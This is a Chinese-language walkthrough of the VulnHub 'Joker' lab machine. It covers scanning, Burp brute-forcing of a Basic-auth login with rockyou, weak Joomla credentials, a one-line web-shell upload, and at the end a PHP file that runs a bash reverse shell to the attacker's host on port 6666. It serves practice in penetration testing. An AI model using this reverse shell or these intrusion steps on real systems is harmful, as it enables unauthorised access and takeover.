VulnHub-Joker通关攻略
一、信息收集
第一步:确定靶机IP为192.168.0.106
第二步:扫描后台及开放端口
#开放端口
22 --- ssh
25 --- SMTP简单邮件传输协议
80 --- HTTP万维网传输信息协议
110 --- POP3邮件协议3
8080 --- Internet 信息服务
第三步:进行敏感目录及文件扫描
DIRECTORY:http://192.168.0.106/css/
DIRECTORY:http://192.168.0.106/img/
http://192.168.0.106/index.html(CODE:200ISIZE:5954)
http://192.168.0.106/phpinfo.php(CODE:200ISIZE:94857)
http://192.168.0.106/server-status(CODE:403ISIZE:278)
第四步:进一步进行dirb扫描,发现secret.txt
第五步:访问8080端口,出现登录框
二、网站爆破
第一步:在secret.txt中多次出现rock,猜测指的是kali中自带的rockyou.txt字典,着手尝试bp抓包,爆破登录8080端口网站
#从互联网上手动下载 rockyou.txt
wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
#下载完成后,将文件移动到 /usr/share/wordlists/ 目录下
sudo mv rockyou.txt /usr/share/wordlists/
#验证文件是否真的存在于指定位置
ls /usr/share/wordlists/rockyou.txt
第二步:生成字典
head -n 100 /usr/share/wordlists/rockyou.txt > test.txt
//从字典文件 /usr/share/wordlists/rockyou.txt 中提取前 100 行内容,并将这些内容重定向输出到一个名为 test.txt 的新文件里。如果 test.txt 文件不存在,该命令会创建此文件;若文件已存在,则会覆盖原文件内容
第三步:抓包,对basic后面的字符串进行解码,得到账号密码格式为“用户名:密码”
第四步:发送到攻击模块,添加payload,将前面生成的字典test.txt移动至物理机,导入
第五步:添加前缀、添加64位编码、取消勾选url编码字符
第六步:开始攻击,进行64位解码,得到账号密码joker:hannah
第七步:登录成功,同时发现该站点使用了joomlaCMS
第八步:尝试弱口令登录,多次尝试有发现此处用户名和密码均为joomla,登录成为Super User
第九步:在用户菜单点击Site Administrator,登陆后台
三、Getshell
第一步:在插件下的模板处发现漏洞,上传一句话木马
第二步:使用蚁剑进行连接,连接成功
第三步:反弹shell,新建fandanshell.php,写入代码,将shell反弹至Kali的6666端口
#fandanshell.php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.107/6666 0>&1'");?>
FROM IYU_